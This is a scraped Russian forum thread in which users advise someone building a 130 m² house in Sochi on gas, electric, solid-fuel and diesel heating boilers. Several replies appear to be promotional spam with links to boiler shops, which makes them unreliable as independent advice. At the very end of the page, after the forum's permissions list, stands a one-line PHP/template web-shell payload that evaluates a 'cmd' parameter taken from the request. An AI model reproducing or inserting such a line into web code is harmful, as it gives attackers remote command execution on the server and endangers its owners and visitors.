+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 11

Тема: Выбор котла для дома 130м2


  1. #1

    Выбор котла для дома 130м2

    В Сочи заказал строительство дома, он будет где-то 130м2, недавно мне сообщили что через месяц дом будет готов. Решил, что пора подумать на счет отопления дома и думаю что вполне любого котла хватит с головой. Но какой лучше выбрать? Не хочу зря переплачивать, так что может подскажите?

  2. #2
    Новичок Serf is on a distinguished road Аватар для Serf
    Регистрация
    05.04.2019
    Сообщений
    136
    На такой небольшой дом супер дорогой котел не понадобиться. Но если говорить о качестве, то смотрите в сторону немецких брендов, они одни из самых надежных. Вот у меня в доме немец стоит уже не первый год, доволен им с головой.

  3. #3
    Цитата Сообщение от Serf Посмотреть сообщение
    На такой небольшой дом супер дорогой котел не понадобиться. Но если говорить о качестве, то смотрите в сторону немецких брендов, они одни из самых надежных. Вот у меня в доме немец стоит уже не первый год, доволен им с головой.
    У меня тоже стоял немецкий, проработал где-то 3 года, потом пришлось выкинуть, а выбирал я не самую дешевую модель между прочим. В итоге решил купить отечественного производства, мол может он дольше прослужит, посмотрим.

  4. #4
    Новичок Devid is on a distinguished road Аватар для Devid
    Регистрация
    05.04.2019
    Сообщений
    132
    Если хотите подешевле, то берите твердотопливные котлы, если не хотите париться с дровами, углями, то берите газовые котлы, например Navien - https://sochi.prom-katalog.ru/catalog/kotly_navien/ . Они естественно будут подороже раза в два-три чем твердотопливные но зато комфортно, без дров и углей) В качестве альтернативы можно еще посмотреть дизельные котлы, но я думаю их стоит применять только там где нет газа, тем более они не дешевле газовых и далеко не экономней.

  5. #5
    Мимо проходил Nevron is on a distinguished road Аватар для Nevron
    Регистрация
    26.01.2019
    Откуда
    Россия.
    Машина
    GOLF R
    Сообщений
    56
    По-моему, газовый коте будет самым экономичным, и по цене дешевым. Только выбирайте модель помощней. И я бы на вашем месте присматривался к Самсунгам, фирма проверенная, по крайней мере я себе такой поставил.

  6. #6
    Мимо проходил Masewrol is on a distinguished road Аватар для Masewrol
    Регистрация
    28.01.2019
    Откуда
    Россия
    Машина
    Gof 6
    Сообщений
    64
    Еще, как вариант, можете посмотреть в этом магазине котлов, выбрать есть из чего, да и цены в принципе адекватные https://www.termbox.ru/ . Вам остается только определиться, какой котел вы хотите, газовый, электро, или твердотопливный. Насчет доставки, не переживайте, она у них есть. Я сам на данный момент там выбираю себе котел, решил ставить газовый, вот только не знаю, какой лучше будет, напольный, или настенный.

  7. #7
    Мимо проходил Doper is on a distinguished road Аватар для Doper
    Регистрация
    27.12.2018
    Откуда
    Россия
    Машина
    Volkswagen
    Сообщений
    71
    В этом году я не успел сделал автономное отопление, строители подвели, не смогли закончить ремонт в квартире вовремя. Теперь придется отоплением заниматься уже в следующем году. Кстати, у меня будет газовый котел, правда с моделью я еще не определился, но время есть.

  8. #8
    Мимо проходил Larik is on a distinguished road Аватар для Larik
    Регистрация
    04.01.2019
    Откуда
    Россия.
    Машина
    Golf 4
    Сообщений
    65
    Не знаю, как вы решите, но я для себя в дом хочу купить электрический котел Протерм, на данный момент здесь выбираю https://um-climat.ru/catalog/elektri...herm-slovakiya . Во-первых электрические котлы стоят дешевле, чем остальные, а во-вторых, они просты в обслуживании, и эксплуатации, и между прочим, эти котлы более безопасны, чем газовые, или твердотопливные. В общем, выбор за вами.

  9. #9
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    тоже нужны варианты покупки котла, куда обратиться?

  10. #10
    Новичок Rusik23 is on a distinguished road Аватар для Rusik23
    Регистрация
    25.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    179
    Котлы отопления в магазине https://акватех.рус - просто отличные! Я заказывала у них новый котел для своего дома и была приятно удивлена качеством предоставленных товаров. Котел работает отлично и эффективно, что значительно снизило мои расходы на отопление. Сотрудники магазина профессионально подошли к выбору и помогли с доставкой.

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Во что поиграть дома?
    от Serf в разделе Семья и дом
    Ответов: 25
    Последнее сообщение: 03.04.2024, 01:32
  2. Не нравится фасад дома
    от Kommunar в разделе Курилка
    Ответов: 10
    Последнее сообщение: 13.10.2023, 10:06
  3. Ответов: 0
    Последнее сообщение: 28.06.2019, 10:14
  4. Отделка фасада дома. Чем?
    от ГумбинМакс в разделе Курилка
    Ответов: 4
    Последнее сообщение: 26.03.2019, 14:51
  5. Охрана дома
    от Fen в разделе Семья и дом
    Ответов: 33
    Последнее сообщение: 17.03.2019, 21:06

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}